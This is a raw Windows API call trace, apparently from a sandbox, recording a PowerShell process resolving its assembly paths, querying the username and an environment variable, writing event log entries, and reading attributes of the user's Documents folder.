	[0216.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0216.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0216.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0216.002] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0216.002] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0216.002] CoTaskMemFree (pv=0x1b86daf0) 
	[0216.003] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0216.003] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0216.003] CoTaskMemFree (pv=0xe5880) 
	[0216.003] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f10ed8*="Variable", lpRawData=0x2f10c68) returned 1
	[0216.005] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0216.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0216.005] CoTaskMemFree (pv=0x18fd40) 
	[0216.007] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0216.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0216.007] CoTaskMemFree (pv=0x18fd40) 
	[0216.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0216.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0216.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0216.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.319] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0218.319] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0218.319] CoTaskMemFree (pv=0x1b86daf0) 
	[0218.320] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0218.320] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0218.320] CoTaskMemFree (pv=0xe5880) 
	[0218.320] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f24aa0*="Certificate", lpRawData=0x2f24830) returned 1
	[0218.781] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.782] CoTaskMemFree (pv=0x18fd40) 
	[0218.784] GetLogicalDrives () returned 0x4
	[0218.785] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27d030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.786] CoTaskMemAlloc (cb=0x20e) returned 0x1b84e930
	[0218.786] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b84e930 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0218.786] CoTaskMemFree (pv=0x1b84e930) 
	[0218.787] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.787] CoTaskMemFree (pv=0x18fd40) 
	[0218.787] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.787] CoTaskMemFree (pv=0x18fd40) 
	[0218.801] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.801] CoTaskMemFree (pv=0x18fd40) 
	[0218.805] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.805] CoTaskMemFree (pv=0x18fd40) 
	[0218.807] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.807] SetErrorMode (uMode=0x1) returned 0x1
	[0218.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.807] SetErrorMode (uMode=0x1) returned 0x1
	[0218.807] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.807] SetErrorMode (uMode=0x1) returned 0x1
	[0218.808] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.808] SetErrorMode (uMode=0x1) returned 0x1
	[0218.809] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0218.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.809] CoTaskMemFree (pv=0x18fd40) 
	[0218.816] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.817] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.817] SetErrorMode (uMode=0x1) returned 0x1
	[0218.817] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.817] SetErrorMode (uMode=0x1) returned 0x1
	[0218.817] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.817] SetErrorMode (uMode=0x1) returned 0x1
	[0218.817] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.817] SetErrorMode (uMode=0x1) returned 0x1
	[0218.817] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.817] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.818] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.818] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.818] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.818] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.818] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.818] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.818] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.818] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.819] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.819] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.819] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.819] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.819] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.819] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.819] SetErrorMode (uMode=0x1) returned 0x1
	[0218.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cfb0 | out: lpFileInformation=0x27cfb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.820] SetErrorMode (uMode=0x1) returned 0x1
	[0218.820] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.820] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x27cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0218.822] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0218.822] SetErrorMode (uMode=0x1) returned 0x1
	[0219.322] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.322] SetErrorMode (uMode=0x1) returned 0x1
	[0219.322] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.322] SetErrorMode (uMode=0x1) returned 0x1
	[0219.322] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0219.322] SetErrorMode (uMode=0x1) returned 0x1
	[0219.322] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x27cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.323] SetErrorMode (uMode=0x1) returned 0x1
	[0219.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.323] SetErrorMode (uMode=0x1) returned 0x1
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.323] SetErrorMode (uMode=0x1) returned 0x1
	[0219.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.323] SetErrorMode (uMode=0x1) returned 0x1
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x27cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.323] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.324] SetErrorMode (uMode=0x1) returned 0x1
	[0219.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.324] SetErrorMode (uMode=0x1) returned 0x1
	[0219.324] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.324] SetErrorMode (uMode=0x1) returned 0x1
	[0219.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27cff0 | out: lpFileInformation=0x27cff0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.324] SetErrorMode (uMode=0x1) returned 0x1
	[0219.324] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0219.324] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x27cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.274] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27d050, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0220.274] SetErrorMode (uMode=0x1) returned 0x1
	[0220.274] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d2b0 | out: lpFileInformation=0x27d2b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0220.274] SetErrorMode (uMode=0x1) returned 0x1
	[0220.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
